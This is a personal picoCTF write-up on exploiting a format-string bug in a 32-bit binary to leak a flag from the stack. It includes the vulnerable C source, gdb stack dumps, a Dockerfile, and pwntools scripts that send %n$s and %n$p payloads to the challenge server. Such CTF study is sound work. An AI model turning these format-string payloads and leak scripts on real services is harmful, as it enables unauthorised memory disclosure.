I actually solved this problem last year.

Back then I just brute-forced the offset and got the flag.

A year ago, I was pretty excited that I got the flag by watching John's video.

I recently learned a few more things about format strings that are worth posting.

file + checksec + C code

It’s a 32-bit dynamically linked ELF. There’s no stack canary and no PIE, but NX is enabled and RELRO is partial, so it isn’t entirely unprotected.

file vuln
vuln: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, BuildID[sha1]=17bb7adc72aff4022d6a1c451eb9adcf34df2f8c, for GNU/Linux 3.2.0, not stripped
checksec vuln
[*] '/home/picoctf/pwn/flag_leak/vuln'
    Arch:       i386-32-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX enabled
    PIE:        No PIE (0x8048000)
    SHSTK:      Enabled
    IBT:        Enabled
    Stripped:   No
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <wchar.h>
#include <locale.h>

#define BUFSIZE 64
#define FLAGSIZE 64

void readflag(char* buf, size_t len) {
  FILE *f = fopen("flag.txt","r");
  if (f == NULL) {
    printf("%s %s", "Please create 'flag.txt' in this directory with your",
                    "own debugging flag.\n");
    exit(0);
  }

  fgets(buf,len,f); // size bound read
}

void vuln(){
   char flag[BUFSIZE];
   char story[128];

   readflag(flag, FLAGSIZE);

   printf("Tell me a story and then I'll tell you one >> ");
   scanf("%127s", story);
   printf("Here's a story - \n");
   printf(story);
   printf("\n");
}

int main(int argc, char **argv){

  setvbuf(stdout, NULL, _IONBF, 0);
  
  // Set the gid to the effective gid
  // this prevents /bin/sh from dropping the privileges
  gid_t gid = getegid();
  setresgid(gid, gid, gid);
  vuln();
  return 0;
}

There’s clearly a format-string bug.

printf(story);

On my older blog (written in Korean), I brute-forced the offset and got the flag.

Below is the code I used before. You can read the writeup here.

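from pwn import *

# Try each positional argument as a string pointer (%i$s).
# Positional indices start at 1; a bad pointer crashes the
# process, which shows up here as an EOFError.
for i in range(1, 100):
    r = remote('saturn.picoctf.net', 56734)
    try:
        r.sendlineafter(b'>', f'%{i}$s'.encode())
        r.recvline()           # skip the "Here's a story -" line
        result = r.recvline()  # the line printed by printf(story)
        print(f'{i}: {result}')
    except EOFError:
        pass
    finally:
        r.close()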

Before going to sleep, I suddenly remembered that I had found a way to automate finding the offset for leaks in format-string bugs.

I slightly modified my previous code to automate the offset-finding procedure.

It included some redundant code in my opinion.

from pwn import *

context.arch = 'i386'  # vuln is a 32-bit ELF, not amd64
p = process('./vuln')

def send_payload(payload):
    p.recvuntil(b'>>')  # Change to match your binary's prompt
    p.sendline(payload)
    return p.recvline()

offset = FmtStr(send_payload).offset
log.info(f'Offset found at {offset}')
p.interactive()

I expected the code above would magically find the offset; however, when I ran it, it threw an error.

python solve.py 
[+] Starting local process './vuln': pid 11852
Traceback (most recent call last):
  File "/home/hwkim301/picoctf/flag_leak/solve.py", line 11, in <module>
    offset = FmtStr(send_payload).offset
             ^^^^^^^^^^^^^^^^^^^^
  File "/home/hwkim301/venv/lib/python3.12/site-packages/pwnlib/fmtstr.py", line 930, in __init__
    self.offset, self.padlen = self.find_offset()
                               ^^^^^^^^^^^^^^^^^^
  File "/home/hwkim301/venv/lib/python3.12/site-packages/pwnlib/fmtstr.py", line 949, in find_offset
    leak = self.leak_stack(off, marker)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/hwkim301/venv/lib/python3.12/site-packages/pwnlib/fmtstr.py", line 940, in leak_stack
    leak = re.findall(br"START(.*?)END", leak, re.MULTILINE | re.DOTALL)[0]
           ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~^^^
IndexError: list index out of range
[*] Process './vuln' stopped with exit code 0 (pid 11852)
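The IndexError in the traceback can be reproduced without the binary. This is a minimal sketch using only Python's re module. The regex is copied from the traceback, while the two sample byte strings are my assumptions about what the process sends back: the first line after the prompt, and a line like the one printf(story) would produce for a %p probe.

```python
import re

# Regex copied from pwnlib/fmtstr.py as shown in the traceback.
PATTERN = re.compile(br"START(.*?)END", re.MULTILINE | re.DOTALL)

# Assumed inputs (illustrative, not captured from the real process):
# the line recvline() would return right after the prompt, and a
# line resembling the printf(story) output for a marker payload.
header_line = b" Here's a story - \n"
story_line = b"aaaabaaacaaadaaaeaaaSTART0xffffc840END\n"

def extract_leak(data: bytes) -> bytes:
    """Mimic leak_stack: take the first START...END match."""
    return PATTERN.findall(data)[0]

try:
    extract_leak(header_line)
    header_result = "matched"
except IndexError:
    header_result = "IndexError"

print(header_result)             # the header line carries no marker
print(extract_leak(story_line))  # the value between the markers
```

If that assumption holds, send_payload would have to skip the header line and return the one after it, and it would need a fresh process for every payload because vuln exits after a single prompt.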

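An important fact I didn’t know until now is that FmtStr’s offset detection only works if the function you pass it returns the output of the vulnerable printf for each payload it sends. That tends to be straightforward when the binary reads a whole line with something like fgets, gets, or read.

Here the traceback shows that the START(.*?)END regex found nothing in what send_payload returned: the first recvline() after the prompt is the "Here's a story -" line, not the line printed by printf(story).

On top of that, this binary uses scanf with %127s, which stops reading input as soon as it encounters whitespace.

For example, you can see below that it stops taking input the second I enter a space.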

./vuln 
Tell me a story and then I'll tell you one >> AAAAA %p
Here's a story - 
AAAAA
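The whitespace behaviour can be approximated in a few lines of Python. This is only a rough model of scanf("%127s"), not glibc's implementation, and the helper name scanf_percent_s is made up for illustration.

```python
def scanf_percent_s(line: str, width: int = 127) -> str:
    """Approximate scanf("%127s"): skip leading whitespace, then take
    up to `width` non-whitespace characters."""
    stripped = line.lstrip()
    token = stripped.split(maxsplit=1)[0] if stripped else ""
    return token[:width]

print(scanf_percent_s("AAAAA %p"))        # everything after the space is dropped
print(len(scanf_percent_s(".%p" * 50)))   # long input is capped at the width
```

The width cap matters as much as the whitespace rule: a probe made of fifty ".%p" groups is 150 characters long, so only the first 127 characters reach printf.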

I read the writeup here to figure out how to calculate the offset by hand instead of using FmtStr.

So I set a breakpoint right after readflag, at 0x0804935a.

I ran the binary and then calculated the distance from the input buffer (story) to the flag.

Knowing the distance from the buffer to the flag helps find the offset for the leak.

gef➤  disass vuln
Dump of assembler code for function vuln:
   0x08049333 <+0>:     endbr32
   0x08049337 <+4>:     push   ebp
   0x08049338 <+5>:     mov    ebp,esp
   0x0804933a <+7>:     push   ebx
   0x0804933b <+8>:     sub    esp,0xc4
   0x08049341 <+14>:    call   0x80491f0 <__x86.get_pc_thunk.bx>
   0x08049346 <+19>:    add    ebx,0x2cba
   0x0804934c <+25>:    sub    esp,0x8
   0x0804934f <+28>:    push   0x40
   0x08049351 <+30>:    lea    eax,[ebp-0x48]
   0x08049354 <+33>:    push   eax
   0x08049355 <+34>:    call   0x80492b6 <readflag>
   0x0804935a <+39>:    add    esp,0x10
   0x0804935d <+42>:    sub    esp,0xc
   0x08049360 <+45>:    lea    eax,[ebx-0x1f9c]
   0x08049366 <+51>:    push   eax
   0x08049367 <+52>:    call   0x80490f0 <printf@plt>
   0x0804936c <+57>:    add    esp,0x10
   0x0804936f <+60>:    sub    esp,0x8
   0x08049372 <+63>:    lea    eax,[ebp-0xc8]
   0x08049378 <+69>:    push   eax
   0x08049379 <+70>:    lea    eax,[ebx-0x1f6d]
   0x0804937f <+76>:    push   eax
   0x08049380 <+77>:    call   0x8049180 <__isoc99_scanf@plt>
   0x08049385 <+82>:    add    esp,0x10
   0x08049388 <+85>:    sub    esp,0xc
   0x0804938b <+88>:    lea    eax,[ebx-0x1f67]
   0x08049391 <+94>:    push   eax
   0x08049392 <+95>:    call   0x8049120 <puts@plt>
   0x08049397 <+100>:   add    esp,0x10
   0x0804939a <+103>:   sub    esp,0xc
   0x0804939d <+106>:   lea    eax,[ebp-0xc8]
   0x080493a3 <+112>:   push   eax
   0x080493a4 <+113>:   call   0x80490f0 <printf@plt>
   0x080493a9 <+118>:   add    esp,0x10
   0x080493ac <+121>:   sub    esp,0xc
   0x080493af <+124>:   push   0xa
   0x080493b1 <+126>:   call   0x8049170 <putchar@plt>
   0x080493b6 <+131>:   add    esp,0x10
   0x080493b9 <+134>:   nop
[ Legend: Modified register | Code | Heap | Stack | String ]
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
$eax   : 0xffffc840  →  "hwkim301\n"
$ebx   : 0x0804c000  →  0x0804bf10  →  <_DYNAMIC+0000> add DWORD PTR [eax], eax
$ecx   : 0x0       
$edx   : 0x0804d238  →  0x00000000
$esp   : 0xffffc7b0  →  0xffffc840  →  "hwkim301\n"
$ebp   : 0xffffc888  →  0xffffc8a8  →  0x00000000
$esi   : 0x08049430  →  <__libc_csu_init+0000> endbr32 
$edi   : 0xf7ffcb60  →  0x00000000
$eip   : 0x0804935a  →  <vuln+0027> add esp, 0x10
$eflags: [zero carry PARITY adjust SIGN trap INTERRUPT direction overflow resume virtualx86 identification]
$cs: 0x23 $ss: 0x2b $ds: 0x2b $es: 0x2b $fs: 0x00 $gs: 0x63 
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0xffffc7b0│+0x0000: 0xffffc840  →  "hwkim301\n"  ← $esp
0xffffc7b4│+0x0004: 0x00000040 ("@"?)
0xffffc7b8│+0x0008: 0x00000000
0xffffc7bc│+0x000c: 0x08049346  →  <vuln+0013> add ebx, 0x2cba
0xffffc7c0│+0x0010: 0xffffffff
0xffffc7c4│+0x0014: 0xf7d87d1c  →  0x00001aaa
0xffffc7c8│+0x0018: 0xf7fc1400  →  0xf7d78000  →  0x464c457f
0xffffc7cc│+0x001c: 0xffffc800  →  0xffffc840  →  "hwkim301\n"
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:32 ────
    0x8049351 <vuln+001e>      lea    eax, [ebp-0x48]
    0x8049354 <vuln+0021>      push   eax
    0x8049355 <vuln+0022>      call   0x80492b6 <readflag>
●→  0x804935a <vuln+0027>      add    esp, 0x10
    0x804935d <vuln+002a>      sub    esp, 0xc
    0x8049360 <vuln+002d>      lea    eax, [ebx-0x1f9c]
    0x8049366 <vuln+0033>      push   eax
    0x8049367 <vuln+0034>      call   0x80490f0 <printf@plt>
    0x804936c <vuln+0039>      add    esp, 0x10
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "vuln_patched", stopped 0x804935a in vuln (), reason: BREAKPOINT
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0x804935a → vuln()
[#1] 0x8049418 → main()
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
gef➤ 
0x08049351 <+30>:    lea    eax,[ebp-0x48]
0x08049354 <+33>:    push   eax
0x08049355 <+34>:    call   0x80492b6 <readflag>

[ebp-0x48] is where the flag starts.

0x0804939d <+106>:   lea    eax,[ebp-0xc8]
0x080493a3 <+112>:   push   eax
0x080493a4 <+113>:   call   0x80490f0 <printf@plt>

[ebp-0xc8] is where the buffer starts.

gef➤  p/d 0xc8-0x48
$1 = 128

The offset from the buffer to the flag is 128.

However, you need to divide it by 4 since each value on the stack is 4 bytes wide (32-bit).

After dividing 128 by 4 you get 32; however, the offset in the writeup is actually 24.

Huh, that’s weird.

I thought the different offsets were caused by a discrepancy between the Ubuntu version on the remote server and the one I’m using (24.04).

So I ran pwninit and patched the binary to ensure my computer uses the same libc and ld-linux.so.2 as the server.

Even after running pwninit, the results were still the same.

I even created a Dockerfile and ran the binary there, but the results did not differ.

It looks like I was going on a wild goose chase, LOL.

Nonetheless, here are some things I’ve learned from this challenge.

1. Calculating offsets using disassembly from gdb or objdump isn’t always 100% correct.

2. Running a program under gdb isn’t the same as running it normally.

gdb itself can slightly change the initial stack layout, for example by adding environment variables such as LINES and COLUMNS.

3. A Docker container shares the host machine’s kernel.

Subtle differences between the host’s kernel and the remote server’s kernel can alter how a process is loaded to memory.

4. Use pwninit even when you can run the binary.

I previously thought that you should run pwninit only when you can’t run the binary on your computer, but if the binary was built on another version of Ubuntu, you should still use pwninit.

Even if the binary runs fine on a different version of Ubuntu or libc, the disassembly and stack layout you see while debugging are likely to differ, so pwninit is still worth running.

I guess that’s why everyone just sent a bunch of %ps to brute force and get the flag.

Dockerfiles

In my here's a libc writeup I explained Dockerfiles, but I never had the chance to create one and run a Docker container.

First let’s have a look at which glibc the binary used.

The binary was probably built on Ubuntu 20.04 with glibc 2.31.

strings vuln | grep Ubuntu
GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.1) 9.4.0

Now that we know the Ubuntu version, we’ll make a Dockerfile and attach to a container.

Here’s the Dockerfile I used; Gemini created it for me.

# Use the 64-bit Ubuntu 20.04 base image
FROM ubuntu:20.04

# Add support for the i386 (32-bit) architecture
RUN dpkg --add-architecture i386

# Avoid interactive prompts during package installation
ENV DEBIAN_FRONTEND=noninteractive

# Install the locales package and generate the en_US.UTF-8 locale
RUN apt-get update && apt-get install -y locales && \
    locale-gen en_US.UTF-8

# Set the language environment variable for the container
ENV LANG=en_US.UTF-8

# Update and install 32-bit libraries and common pwn tools
RUN apt-get update && apt-get install -y \
    libc6:i386 \
    gdb \
    python3 \
    python3-pip \
    wget \
    && rm -rf /var/lib/apt/lists/*

# Install pwntools
RUN python3 -m pip install pwntools

# Install a compatible version of GEF
RUN wget -q -O ~/.gdbinit-gef.py https://github.com/hugsy/gef/raw/2022.06/gef.py
RUN echo "source ~/.gdbinit-gef.py" >> ~/.gdbinit

The Dockerfile reads much like a shell script that runs Linux and Python commands.

After saving the file as Dockerfile, you can build and run it with the following commands.

docker build -t 20.04 .
docker run --rm -it 20.04 /bin/bash

The --rm flag automatically removes the container when it exits.

The -i flag (--interactive) keeps the input channel (STDIN) open.

In plain words, it lets you type commands in the container.

The -t flag (--tty) allocates a pseudo-TTY.

In simple terms, it creates a terminal.

Then you can wget the binary from picoCTF and run it.

Another important point is that you need to set a UTF-8 locale and download a GEF release that still runs on Python 3.8, which is what Ubuntu 20.04 ships, because newer GEF versions use syntax introduced in Python 3.10 or later.

There are a couple of ways to achieve this, like using git checkout, but Gemini just found an older version of the GEF file.

We’ll set a breakpoint right at the second printf, the printf(story) call.

I created a local flag.txt and wrote my name (hwkim301) in it.

You can use the telescope command in GEF to dereference an address.

gef➤  telescope $esp -l 40
0xffffc7c0│+0x0000: 0xffffc7d0  →  "AAAA"        ← $esp
0xffffc7c4│+0x0004: 0xffffc7d0  →  "AAAA"
0xffffc7c8│+0x0008: 0x00000000
0xffffc7cc│+0x000c: 0x08049346  →  <vuln+0013> add ebx, 0x2cba
0xffffc7d0│+0x0010: "AAAA"
0xffffc7d4│+0x0014: 0xf7d87d00  →  "PD\r"
0xffffc7d8│+0x0018: 0xf7fc1400  →  0xf7d78000  →  0x464c457f
0xffffc7dc│+0x001c: 0xffffc810  →  0xffffc850  →  "hwkim301\n"
0xffffc7e0│+0x0020: 0xffffffff
0xffffc7e4│+0x0024: 0xf7d8d8dc  →  0x0000221b
0xffffc7e8│+0x0028: 0xf7fc1400  →  0xf7d78000  →  0x464c457f
0xffffc7ec│+0x002c: 0xffffc8a0  →  0xffffffff
0xffffc7f0│+0x0030: 0xf7fa8e34  →  ",\r#"
0xffffc7f4│+0x0034: 0x00000000
0xffffc7f8│+0x0038: 0x0804838d  →  "setresgid"
0xffffc7fc│+0x003c: 0xf7ffda20  →  0x00000000
0xffffc800│+0x0040: 0x0000000d ("\r"?)
0xffffc804│+0x0044: 0xf7fd8ac6  →  <_dl_fixup+00f6> mov ebp, eax
0xffffc808│+0x0048: 0x0804838d  →  "setresgid"
0xffffc80c│+0x004c: 0xf7ffda20  →  0x00000000
0xffffc810│+0x0050: 0xffffc850  →  "hwkim301\n"
0xffffc814│+0x0054: 0xf7ffdbf4  →  0xf7ffdb8c  →  0xf7fc16f0  →  0xf7ffda20  →  0x00000000
0xffffc818│+0x0058: 0xf7fc1720  →  0x080483cd  →  "GLIBC_2.0"
0xffffc81c│+0x005c: 0x00000001
0xffffc820│+0x0060: 0x00000001
0xffffc824│+0x0064: 0x00000000
0xffffc828│+0x0068: 0xf7fc1720  →  0x080483cd  →  "GLIBC_2.0"
0xffffc82c│+0x006c: 0x00000001
0xffffc830│+0x0070: 0x00000050 ("P"?)
0xffffc834│+0x0074: 0xf7ffcfe8  →  0x00033f28
0xffffc838│+0x0078: 0x00000d07
0xffffc83c│+0x007c: 0x08048338  →   add BYTE PTR [ecx+ebp*2+0x62], ch
0xffffc840│+0x0080: 0x0804c034  →  0xf7e7ae50  →  <setresgid+0000> endbr32 
0xffffc844│+0x0084: 0x080484a4  →  0x0804c034  →  0xf7e7ae50  →  <setresgid+0000> endbr32 
0xffffc848│+0x0088: 0x00000307
0xffffc84c│+0x008c: 0x08048338  →   add BYTE PTR [ecx+ebp*2+0x62], ch
0xffffc850│+0x0090: "hwkim301\n"
0xffffc854│+0x0094: "m301\n"
0xffffc858│+0x0098: 0x0000000a ("\n"?)
0xffffc85c│+0x009c: 0xf7e7ae92  →  0xfff0003d ("="?)

The start of the flag is at +0x0090, and dividing it by 4 gives us 36.

You need to divide it by 4 since each value on the stack is 4 bytes wide (32-bit).

gef➤  p/d 0x90/4
$1 = 36

The 36th argument will leak the start of the flag.
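One way to reconcile the 32 from the disassembly with the 36 seen here is to account for where esp sits when printf(story) is called. The sketch below redoes the arithmetic in Python using only offsets read from the disassembly of vuln. The helper name arg_index is hypothetical, and it assumes the usual i386 cdecl layout in which the format pointer sits at [esp] and the n-th positional argument at [esp + 4*n].

```python
WORD = 4  # bytes per stack slot on i386

# Offsets relative to ebp, taken from the disassembly of vuln().
FLAG = -0x48    # lea eax,[ebp-0x48] before the call to readflag
STORY = -0xc8   # lea eax,[ebp-0xc8] before the call to printf

# esp at the printf(story) call: push ebx (4) and sub esp,0xc4 in the
# prologue, then sub esp,0xc and push eax (4) for the argument.
ESP_AT_CALL = -(4 + 0xc4 + 0xc + 4)   # ebp-0xd8

def arg_index(offset_from_ebp: int) -> int:
    """Positional index n such that %n$p reads this stack slot."""
    return (offset_from_ebp - ESP_AT_CALL) // WORD

print(arg_index(STORY))                    # slot where the story buffer begins
print(arg_index(FLAG))                     # slot where the flag begins
print(arg_index(FLAG) - arg_index(STORY))  # distance between the two in slots
```

Under that assumption, 32 is the distance between the two buffers measured in slots, and the story buffer itself starts at argument 4, which agrees with the telescope output where "AAAA" sits at +0x0010.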

We don’t yet know the offset for the end of the flag: to calculate it, we’d need the flag’s length, divided by 4 and added to 36.

If we could attach gdb to the remote instance, we could read the flag’s length there, but since we can’t, we’ll have to brute-force the ending offset.

Now that we know that %36$p is the start of the flag, we’ll send some more %ps to find the ending offset.

nc saturn.picoctf.net 51847
Tell me a story and then I'll tell you one >> .%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p
Here's a story - 
.0xffd4d6d0.0xffd4d6f0.0x8049346.0x2e70252e.0x252e7025.0x70252e70.0x2e70252e.0x252e7025.0x70252e70.0x2e70252e.0x252e7025.0x70252e70.0x2e70252e.0x252e7025.0x70252e70.0x2e70252e.0x252e7025.0x70252e70.0x2e70252e.0x252e7025.0x70252e70.0x2e70252e.0x252e7025.0x70252e70.0x2e70252e.0x252e7025.0x70252e70.0x2e70252e.0x252e7025.0x70252e70.0x2e70252e.0x252e7025.0x70252e70.0x2e70252e.0x2e7025.0x6f636970.0x7b465443.0x6b34334c.0x5f676e31.0x67346c46.0x6666305f.0x3474535f.

You can see that almost all the numbers are 0x2e70252e, 0x252e7025, and 0x70252e70, which are the ASCII bytes of the format specifiers we sent.


from pwn import *

p32(0x2e70252e)
b'.%p.'

p32(0x70252e70)
b'p.%p'

However, if you look carefully, there’s a number that’s totally different.

Unpacking it with pwntools shows you it’s the start of the flag.

We can also confirm the fact that the 36th %p leaks the start of the flag.

from pwn import *

p32(0x6f636970)
b'pico'

The 45th %p will get you the last part of the flag.
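With the flag in hand, the end index can be checked after the fact. This is a small sketch of that arithmetic; last_index is a hypothetical helper, and it returns the last slot inclusively, so it subtracts one after adding the number of 4-byte words.

```python
import math

FLAG_START_INDEX = 36   # from the telescope output: 0x90 / 4
WORD = 4                # bytes per stack slot on i386

def last_index(flag_length: int, start: int = FLAG_START_INDEX) -> int:
    """Index of the last %n$p slot that still holds flag bytes."""
    words = math.ceil(flag_length / WORD)
    return start + words - 1

flag = b"picoCTF{L34k1ng_Fl4g_0ff_St4ck_999e2824}"
print(len(flag), last_index(len(flag)))
```

On the remote you only learn the length once the closing brace shows up in a leaked word, so this is a sanity check rather than a way to skip the probing.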

I also couldn’t get the flag cleanly in interactive mode.

To do that, you’d need multiple for loops, but I didn’t want to, so I just copied the hexadecimal values and wrote a list comprehension in IPython.

My previous code used %24$s to leak the flag, but the newer code uses %36$p through %45$p.

How did %24$s and %36$p both leak the flag?

What’s the difference between using a $s and $p?

Most of us know that %s is used for strings and %p is used for printing pointers (memory addresses).

The %s specifier finds a pointer (an address) on the stack, follows that pointer to a different location in memory, and then prints the string it finds there.

On the other hand the %p or %x specifier finds the raw data directly on the stack and prints that value as a hexadecimal number. It doesn’t follow any pointers.

In conclusion, when using %24$s, printf jumps to the 24th argument slot on the stack.

It reads the value at that position, which is a memory address, dereferences it and prints the string found there.

However when using %36$p, printf jumps to the 36th value on the stack, reads the value at that position, and prints the raw-value in hexadecimal.
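The difference can be modelled with a toy stack and memory. This is a simplified sketch and not how glibc implements printf: the dictionaries and the helpers fmt_p and fmt_s are made up for illustration, and the sample values are borrowed from the local telescope output, where slot 20 (+0x0050) holds a pointer to the flag and slot 36 (+0x0090) holds the flag bytes themselves.

```python
import struct

# Hypothetical toy memory: address -> bytes stored there.
memory = {
    0xffffc850: b"hwkim301\n\x00",
}

# Hypothetical stack slots: positional index -> 32-bit value.
stack = {
    20: 0xffffc850,                       # a pointer to the string
    36: struct.unpack("<I", b"hwki")[0],  # the string's first 4 bytes
}

def fmt_p(index: int) -> str:
    """%n$p: print the slot's own value as hex, no dereference."""
    return hex(stack[index])

def fmt_s(index: int) -> bytes:
    """%n$s: treat the slot's value as an address and read a C string."""
    data = memory[stack[index]]
    return data.split(b"\x00", 1)[0]

print(fmt_p(36))   # raw bytes of the string, shown as a little-endian number
print(fmt_s(20))   # the string the pointer refers to
```

In this model, fmt_s(36) fails with a KeyError because the flag bytes are not a valid address, which loosely mirrors why %s on an arbitrary slot tends to crash the real process.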

I also tried to get the flag in interactive mode, but as soon as I sent the format string, I received an EOF.

You can get the flag in interactive mode if you use multiple for loops, but I thought it would be overkill, so instead I wrote a list comprehension in IPython after getting the EOF.

from pwn import * 

r = remote('saturn.picoctf.net', 58501)
r.sendline(b'%36$p,%37$p,%38$p,%39$p,%40$p,%41$p,%42$p,%43$p,%44$p,%45$p')
r.interactive()
# 0x6f636970,0x7b465443,0x6b34334c,0x5f676e31,0x67346c46,0x6666305f,0x3474535f,0x395f6b63,0x32653939,0x7d343238
from pwn import *

leak=[0x6f636970,0x7b465443,0x6b34334c,0x5f676e31,0x67346c46,0x6666305f,0x3474535f,0x395f6b63,0x32653939,0x7d343238]

flag=b''.join([p32(x) for x in leak])
print(flag)
# b'picoCTF{L34k1ng_Fl4g_0ff_St4ck_999e2824}'
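The copy-and-paste step can be avoided by building the payload and decoding the reply in code. The following is a minimal sketch using only the standard library; build_payload and decode_reply are hypothetical helper names, and the reply is the line captured above. It assumes every leaked slot prints as 0x..., since glibc prints (nil) for a zero value and that would need separate handling.

```python
import struct

def build_payload(first: int, last: int) -> bytes:
    """Comma-separated %n$p probes for slots first..last inclusive."""
    return ",".join(f"%{i}$p" for i in range(first, last + 1)).encode()

def decode_reply(reply: bytes) -> bytes:
    """Turn '0x...,0x...' into the little-endian bytes it encodes."""
    words = [int(tok, 16) for tok in reply.decode().strip().split(",")]
    return b"".join(struct.pack("<I", w) for w in words)

payload = build_payload(36, 45)
reply = (b"0x6f636970,0x7b465443,0x6b34334c,0x5f676e31,0x67346c46,"
         b"0x6666305f,0x3474535f,0x395f6b63,0x32653939,0x7d343238")

print(payload)
print(decode_reply(reply))
```

The payload stays well under the 127-character limit imposed by scanf, and it contains no whitespace, so it reaches printf intact.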

Reference Writeup

  1. Japanese writeup

This was the only writeup I found that didn’t brute-force the offsets.

Use a translator like DeepL or Google Translate to read it.

Although it’s rated medium difficulty on picoCTF, understanding why %36$p leaks the flag is hard.

I still can’t explain why %24$s returns a sliced flag.

I guess I’ll have to write another format-string bug writeup after I really master format string vulnerabilities.